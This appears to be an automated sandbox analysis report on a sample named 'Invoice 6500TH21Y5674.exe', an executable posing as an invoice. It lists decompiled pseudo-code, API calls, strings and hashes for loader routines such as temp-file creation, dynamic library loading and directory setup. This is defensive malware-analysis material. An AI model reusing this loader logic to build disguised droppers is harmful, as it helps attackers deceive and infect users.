UXTHEME, xrefs: 00406478

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction ID: e4af93c3cdb1388bd8c61da79080aae0fca49bc102c632b45afecef183fab820
Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction Fuzzy Hash: D3F0F63055020AABEF159B64DD0DFEB375CEB08344F1400BAA986E10C1EA78D9258BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405C9C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C9C(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3d4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405ca0
0x00405ca6
0x00405ca7
0x00405ca7
0x00405cac
0x00405cad
0x00405cb0
0x00405cba
0x00405cc7
0x00405cca
0x00405cd2
0x00000000
0x00000000
0x00405cd6
0x00000000
0x00000000
0x00405cd8
0x00000000
0x00405cd8
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405CB0
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CCA

Strings

nsa, xrefs: 00405CA7
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C9F
"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" , xrefs: 00405C9C

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1776455633
Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction ID: 300c2e40aa17b99eb6a72bfbf7bdfcd49c284ecfca22a4765a13b30c42836751
Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction Fuzzy Hash: B7F08236308308ABEB108F56ED04B9B7B98EF91750F14803BF944DA280D6B599549B68

Uniqueness

Uniqueness Score: -1.00%

Function 72AB16DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E72AB16DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x72ab405c = _a8;
				 *0x72ab4060 = _a16;
				 *0x72ab4064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x72ab4038, E72AB1556);
				_push(1); // executed
				_t37 = E72AB1A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E72AB22AF(_t54);
					}
					E72AB22F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E72AB24D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E72AB156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E72AB24D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E72AB24D8(_t54);
							_t37 = GlobalFree(E72AB1266(E72AB1559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E72AB249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E72AB14E2( *0x72ab4058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E72AB2CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E72AB2A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E72AB26B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x72ab16db
0x72ab16db
0x72ab16db
0x72ab16e5
0x72ab16ed
0x72ab16fa
0x72ab1708
0x72ab170b
0x72ab170d
0x72ab1712
0x72ab1717
0x72ab1836
0x72ab1836
0x72ab171d
0x72ab1721
0x72ab1724
0x72ab1729
0x72ab172b
0x72ab1731
0x72ab1737
0x72ab1767
0x72ab176e
0x72ab1792
0x72ab17dd
0x72ab1794
0x72ab1794
0x72ab1795
0x72ab179b
0x72ab179c
0x72ab17a6
0x72ab17a9
0x72ab17ae
0x72ab17b5
0x72ab17b5
0x72ab17bc
0x72ab17c2
0x72ab17c8
0x72ab17d5
0x72ab17d6
0x72ab17d9
0x72ab1770
0x72ab1771
0x72ab1786
0x72ab1786
0x72ab17e7
0x72ab17ea
0x72ab17f7
0x72ab17fe
0x72ab1806
0x72ab1809
0x72ab1809
0x72ab1806
0x72ab1816
0x72ab181e
0x72ab1823
0x72ab1816
0x72ab182b
0x00000000
0x72ab182d
0x00000000
0x72ab182e
0x72ab182b
0x72ab173b
0x72ab173e
0x72ab175c
0x00000000
0x00000000
0x72ab175f
0x72ab1764
0x72ab1764
0x72ab1766
0x00000000
0x72ab1766
0x72ab1740
0x72ab1741
0x72ab1749
0x72ab174a
0x00000000
0x72ab174a
0x72ab1743
0x72ab1744
0x72ab1752
0x00000000
0x72ab1752
0x72ab1747
0x00000000
0x00000000
0x00000000
0x72ab1747

APIs

Part of subcall function 72AB1A98: GlobalFree.KERNEL32 ref: 72AB1D09
Part of subcall function 72AB1A98: GlobalFree.KERNEL32 ref: 72AB1D0E
Part of subcall function 72AB1A98: GlobalFree.KERNEL32 ref: 72AB1D13

GlobalFree.KERNEL32 ref: 72AB1786
FreeLibrary.KERNEL32(?), ref: 72AB1809
GlobalFree.KERNEL32 ref: 72AB182E

Part of subcall function 72AB22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 72AB22E0

Part of subcall function 72AB26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,72AB1757,00000000), ref: 72AB2782

Part of subcall function 72AB156B: wsprintfA.USER32 ref: 72AB1599

Strings

, xrefs: 72AB180F

Memory Dump Source

Source File: 00000000.00000002.688800351.0000000072AB1000.00000020.00020000.sdmp, Offset: 72AB0000, based on PE: true

Associated: 00000000.00000002.688792553.0000000072AB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688807982.0000000072AB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688815540.0000000072AB5000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 811f27ee0cd63ae26371bbf70cd4f0e179f5f3176e4ff58eb5a6db688a92c568
Instruction ID: d10ff5f0c53c033392ebea4997fa0d3989c0ac257c1699b72be26b7cfe724a58
Opcode Fuzzy Hash: 811f27ee0cd63ae26371bbf70cd4f0e179f5f3176e4ff58eb5a6db688a92c568
Instruction Fuzzy Hash: 10418372540244DBCB019F6CDAC4B953BAEBF09314F14A429E9079A49DDB7CC586CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x7a3038");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x7a3008 =  *0x7a3008 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E004051FB(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x7a4000, 0x40b848, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403887(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040209d
0x0040209d
0x004020a2
0x004020a9
0x00402164
0x004022dd
0x004022dd
0x00402a5a
0x00402a5d
0x00402a69
0x00402a69
0x004020b8
0x004020c2
0x004020c5
0x004020d4
0x004020d8
0x004020de
0x004020e2
0x0040215d
0x00000000
0x0040215d
0x004020e4
0x004020ed
0x004020f1
0x00402135
0x004020f3
0x004020f6
0x004020f9
0x00402129
0x004020fb
0x004020fe
0x00402107
0x00402109
0x00402109
0x00402107
0x004020f9
0x0040213d
0x00402152
0x00402152
0x00000000
0x0040213d
0x004020c8
0x004020ce
0x004020d2
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8

Part of subcall function 004051FB: lstrlenA.KERNEL32(0079ED48,00000000,00798F20,73BCEA30,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,0079ED48,00000000,00798F20,73BCEA30,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
Part of subcall function 004051FB: lstrcatA.KERNEL32(0079ED48,00403210,00403210,0079ED48,00000000,00798F20,73BCEA30), ref: 00405257
Part of subcall function 004051FB: SetWindowTextA.USER32(0079ED48,0079ED48), ref: 00405269
Part of subcall function 004051FB: SendMessageA.USER32 ref: 0040528F
Part of subcall function 004051FB: SendMessageA.USER32 ref: 004052A9
Part of subcall function 004051FB: SendMessageA.USER32 ref: 004052B7

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 64ce8c824d27c4b08c71b8ea544765bea687fe357d244b1b968344694c42faba
Instruction ID: b82e27a23205e400b7882a9dda540b85adfac7e99319b749728402aba69a9ded
Opcode Fuzzy Hash: 64ce8c824d27c4b08c71b8ea544765bea687fe357d244b1b968344694c42faba
Instruction Fuzzy Hash: 55213B32500110EBCF207F608F48A5F36B0AF51358F20423BF601B51D0CBBC49829A1E

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405B05(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405A97(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E0040573E(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040575B(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E004056C1(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E004060D4("C:\\Users\\jones\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015bb
0x004015c2
0x004015c5
0x004015ca
0x004015ce
0x004015d0
0x004015d8
0x004015da
0x004015dc
0x004015e0
0x004015e3
0x004015fb
0x004015fc
0x004015e5
0x004015e5
0x004015e8
0x00000000
0x004015f3
0x004015f4
0x004015f4
0x004015e8
0x00401603
0x0040160a
0x00401617
0x00401617
0x0040160c
0x0040160d
0x00401615
0x00000000
0x00000000
0x00401615
0x0040160a
0x0040161a
0x0040161d
0x0040161f
0x00401620
0x004015d0
0x00401627
0x00401652
0x004022dd
0x00401629
0x0040162b
0x00401636
0x0040163c
0x00401644
0x0040164a
0x0040164a
0x00401644
0x00402a5d
0x00402a69

APIs

Part of subcall function 00405B05: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,?,00405B71,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B13
Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B18
Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B2C

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 004056C1: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405704

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-47812868
Opcode ID: 6e3e91aeebb74725aa607eb0295fde89a22a7ebf8490583d54a6f3dcd53d9237
Instruction ID: 50be7771e3672f66fe07c9109d7a0934d5fb35c2f40f106ce03ebb8fd80801ba
Opcode Fuzzy Hash: 6e3e91aeebb74725aa607eb0295fde89a22a7ebf8490583d54a6f3dcd53d9237
Instruction Fuzzy Hash: F2110831104151EBCB307FA54D409BF37B09A92324B28463FE592B22E3DA3D4942AA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4, struct HWND__* _a11) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a2fb0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a11 != 0) {
						 *0x7a274c =  *0x7a274c + _t12;
						SendMessageA(_a11, 0x402, MulDiv( *0x7a274c, 0x7530,  *0x7a2734), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e0cd62ee3040700a295e5b46d32f75e08d2db3f93dbac9e55f4e6f2709676977
Instruction ID: 845b7e25721e970e15b242f5633496821e9acd9660688f654d55c439198c0cfc
Opcode Fuzzy Hash: e0cd62ee3040700a295e5b46d32f75e08d2db3f93dbac9e55f4e6f2709676977
Instruction Fuzzy Hash: 0701F4316242209FE7195B389D04B2A3698E751314F10813FF951F65F2D678CC129B4C

Uniqueness

Uniqueness Score: -1.00%

Function 004064DD, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064DD(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E0040646F(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x004064e5
0x004064e8
0x004064ef
0x004064f7
0x00406503
0x00000000
0x0040650a
0x004064fa
0x00406501
0x00000000
0x00406512
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
GetProcAddress.KERNEL32(00000000,?), ref: 0040650A

Part of subcall function 0040646F: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406486
Part of subcall function 0040646F: wsprintfA.USER32 ref: 004064BF
Part of subcall function 0040646F: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064D3

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
Instruction ID: 042920e8a29c9b7d047f9b8d679db2b98f9cdac4fa712678353772f8bdeb7375
Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
Instruction Fuzzy Hash: 6EE0863260421167D6105B70BE0493B72A89E84700302043EF546F6144DB38DC769A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C6D, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405C6D(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405c71
0x00405c7e
0x00405c93
0x00405c99

APIs

GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,80000000,00000003), ref: 00405C71
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405C48, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C48(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405c4d
0x00405c53
0x00405c58
0x00405c61
0x00405c61
0x00405c6a

APIs

